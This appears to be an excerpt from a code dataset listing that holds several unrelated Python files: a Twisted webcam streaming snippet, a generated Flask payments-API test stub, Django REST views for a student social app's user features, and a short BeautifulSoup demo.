        MultiPartStream.sendToClients(webcam.repeat().tostring(), "image/jpeg")
        reactor.callLater(1/15., sendFrame)
    root = Resource()
    root.isLeaf = False
    root.putChild("stream", TestStreamResource())
    reactor.listenTCP(8800, Site(root), interface="0.0.0.0")
    reactor.callLater(0, sendFrame)
    reactor.run()
| 8,162 |
src-gen/openapi_server/test/test_payments_controller.py
|
etherisc/bima-bolt-api
| 0 |
2024762
|
# coding: utf-8
from __future__ import absolute_import
import unittest
from flask import json
from six import BytesIO
from openapi_server.models.not_found_response import NotFoundResponse # noqa: E501
from openapi_server.models.payment import Payment # noqa: E501
from openapi_server.models.resource_id import ResourceId # noqa: E501
from openapi_server.test import BaseTestCase
class TestPaymentsController(BaseTestCase):
    """PaymentsController integration test stubs.

    BUGFIX: the generated URL literals contained a stray quote
    ('/api/v1/acre-test'/payments...) left over from a bad template
    substitution, which was a syntax error; the base path is now inlined.
    """

    def test_payments_event_id_get(self):
        """Test case for payments_event_id_get"""
        headers = {
            'Accept': 'application/json',
        }
        response = self.client.open(
            '/api/v1/acre-test/payments/{event_id}'.format(event_id='4ad6f91d-6378-4f52-b817-00cbc85ca39x'),
            method='GET',
            headers=headers)
        self.assert200(response,
                       'Response body is : ' + response.data.decode('utf-8'))

    def test_payments_get(self):
        """Test case for payments_get"""
        headers = {
            'Accept': 'application/json',
        }
        response = self.client.open(
            '/api/v1/acre-test/payments',
            method='GET',
            headers=headers)
        self.assert200(response,
                       'Response body is : ' + response.data.decode('utf-8'))

    def test_payments_post(self):
        """Test case for payments_post"""
        payment = {
            "amount_paid" : 50.0,
            "mobile_num" : "254711234567",
            "mpesa_code" : "PC82GDN7C",
            "mpesa_name" : "<NAME>",
            "order_number" : "A100097-0321",
            "call_time" : "2000-01-23T04:56:07.000+00:00",
            "id" : "8dd6f91d-6378-4f52-b817-00cbc85ca39e"
        }
        headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json',
        }
        response = self.client.open(
            '/api/v1/acre-test/payments',
            method='POST',
            headers=headers,
            data=json.dumps(payment),
            content_type='application/json')
        self.assert200(response,
                       'Response body is : ' + response.data.decode('utf-8'))
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| 2,258 |
cafeteria/users/views.py
|
devGW/PostApp
| 0 |
2024437
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from . import models, serializers
from cafeteria.notifications import views as notification_view
from allauth.socialaccount.providers.kakao.views import KakaoOAuth2Adapter
from rest_auth.registration.views import SocialLoginView
import requests
import json
class ExploreUser(APIView):
    """GET: return the five most recently joined users."""

    def get(self, request, format=None):
        newest_users = models.User.objects.all().order_by('-date_joined')[:5]
        data = serializers.ListUserSerializer(newest_users, many=True).data
        return Response(data=data, status=status.HTTP_200_OK)
class FollowUser(APIView):
    """POST: make the authenticated user follow the user with *user_id*."""

    def post(self, request, user_id, format=None):
        follower = request.user
        try:
            target = models.User.objects.get(id=user_id)
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        # Emit a "follow" notification, then update both sides of the relation.
        notification_view.create_notification(follower, target, "follow")
        follower.following.add(target)
        target.followers.add(follower)
        follower.save()
        target.save()
        return Response(status=status.HTTP_200_OK)
class UnFollowUser(APIView):
    """POST: remove the user with *user_id* from the authenticated user's following."""

    def post(self, request, user_id, format=None):
        follower = request.user
        try:
            target = models.User.objects.get(id=user_id)
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        follower.following.remove(target)
        target.followers.remove(follower)
        follower.save()
        target.save()
        return Response(status=status.HTTP_200_OK)
class UserProfile(APIView):
    """Retrieve (GET) or partially update (PUT) a profile by username."""

    def getUser(self, username):
        # NOTE(review): on a missing user this returns a Response(404)
        # object, which callers then serialize/compare as if it were a
        # User — consider raising Http404 instead; preserved as-is.
        try:
            foundUser = models.User.objects.get(username=username)
            return foundUser
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)

    # View a user's profile.
    def get(self, request, username, format=None):
        foundUser = self.getUser(username)
        serializer = serializers.UserProfileSerializer(foundUser, context={"request": request})
        return Response(data=serializer.data, status=status.HTTP_200_OK)

    # Edit a user's profile (owner only).
    def put(self, request, username, format=None):
        user = request.user
        foundUser = self.getUser(username)
        # The client sends the string 'null' when the image was cleared.
        if("profile_image" in request.data):
            if(request.data["profile_image"] == 'null'):
                data = {'profile_image': None}
            else:
                data = request.data
        else:
            data = request.data
        if user == foundUser:
            serializer = serializers.UserProfileSerializer(
                foundUser, data=data, partial=True, context={"request": request})
            if serializer.is_valid():
                serializer.save()
                return Response(data=serializer.data, status=status.HTTP_200_OK)
            else:
                # BUGFIX: DRF serializers expose validation problems via
                # `.errors` (plural); `.error` raised AttributeError.
                return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        elif user != foundUser:
            return Response(status=status.HTTP_401_UNAUTHORIZED)
class ChangePassword(APIView):
    """PUT: change the authenticated user's password.

    Requires the current password and only allows a user to change their
    own password (the URL username must match the session user).
    """

    def put(self, request, username, format=None):
        user = request.user
        if user.username == username:
            currentPassword = request.data.get('currentPassword', None)
            match = currentPassword is not None and user.check_password(currentPassword)
            if match:
                newPassword = request.data.get('newPassword', None)
                if newPassword is not None:
                    user.set_password(newPassword)
                    # BUGFIX: set_password only updates the in-memory hash;
                    # without save() the new password was never persisted.
                    user.save()
                    return Response(status=status.HTTP_200_OK)
                else:
                    return Response(status=status.HTTP_400_BAD_REQUEST)
            else:
                return Response(status=status.HTTP_400_BAD_REQUEST)
        else:
            return Response(status=status.HTTP_401_UNAUTHORIZED)
class KakaoLogin(SocialLoginView):
    # Kakao OAuth2 social-login endpoint (django-allauth adapter + rest-auth).
    adapter_class = KakaoOAuth2Adapter
class PushToken(APIView):
    """POST: store the push-notification token for the authenticated user."""

    def getUser(self, username):
        # NOTE(review): returns a Response(404) for a missing user, which
        # the caller compares against request.user — preserved as-is.
        try:
            foundUser = models.User.objects.get(username=username)
            return foundUser
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)

    def post(self, request, format=None):
        username = request.user
        foundUser = self.getUser(username)
        serializer = serializers.UserPushToken(data=request.data)
        if username == foundUser:
            serializer = serializers.UserProfileSerializer(
                foundUser, data=request.data, partial=True, allow_null=True, context={"request": request})
            if serializer.is_valid():
                serializer.save()
                return Response(data=serializer.data, status=status.HTTP_200_OK)
            else:
                # BUGFIX: DRF serializers expose failures via `.errors`
                # (plural); `.error` raised AttributeError.
                return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        else:
            # BUGFIX: the fallback serializer was never validated, so
            # reading `.errors` (or the old `.error`) would raise; run
            # validation first to populate the error dict.
            serializer.is_valid()
            return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class IsAlreadyId(APIView):
    """GET: 302 when the username is taken, 202 when it is available."""

    def get(self, request, username, format=None):
        try:
            models.User.objects.get(username=username)
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_202_ACCEPTED)
        return Response(status=status.HTTP_302_FOUND)
class IsAlreadyName(APIView):
    """GET: 302 when the display name is taken, 202 when it is available."""

    def get(self, request, name, format=None):
        try:
            models.User.objects.get(name=name)
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_202_ACCEPTED)
        return Response(status=status.HTTP_302_FOUND)
class IsAlreadyEmail(APIView):
    """GET: 302 when the e-mail is taken, 202 when it is available."""

    def get(self, request, email, format=None):
        try:
            models.User.objects.get(email=email)
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_202_ACCEPTED)
        return Response(status=status.HTTP_302_FOUND)
class StudentAuthentication(APIView):
    """PUT: submit student-verification data and notify the admin account."""

    def getUser(self, username):
        # NOTE(review): returns a Response(404) for a missing user, which
        # the caller compares against request.user — preserved as-is.
        try:
            foundUser = models.User.objects.get(username=username)
            return foundUser
        except models.User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)

    def put(self, request, format=None):
        username = request.user
        foundUser = self.getUser(username)
        foundAdmin = self.getUser("admin")
        if username != foundUser:
            # BUGFIX: this branch previously referenced an undefined
            # `serializer` variable (NameError); reply with a plain 400.
            return Response(status=status.HTTP_400_BAD_REQUEST)
        serializer = serializers.UserAuthentication(
            foundUser, data=request.data, partial=True)
        if not serializer.is_valid():
            # BUGFIX: DRF serializers expose failures via `.errors`
            # (plural); `.error` raised AttributeError.
            return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        # Push an Expo notification to the admin so the request gets reviewed.
        payload = {
            "to": foundAdmin.push_token,
            "title": "알림",
            "sound": "default",
            "body": "재학생 인증 요청이 왔습니다."
        }
        url = "https://exp.host/--/api/v2/push/send"
        header = {
            "Content-Type": "application/json",
        }
        requests.post(url, data=json.dumps(payload), headers=header)
        return Response(data=serializer.data, status=status.HTTP_200_OK)
| 7,504 |
Beautiful Soup/beautifulsoup.py
|
Sid200026/Misc-Programs
| 3 |
2024223
|
from bs4 import BeautifulSoup
# Minimal BeautifulSoup demo: parse a one-element fragment with the lxml
# backend, replace its text node, and pretty-print the result.
html_doc = "<p class='temp'>Hi</p>"
soup = BeautifulSoup(html_doc, 'lxml')
# print(soup.get_text())
# print(soup.name)
soup.find(text="Hi").replace_with("No")
print(soup.prettify())
| 212 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.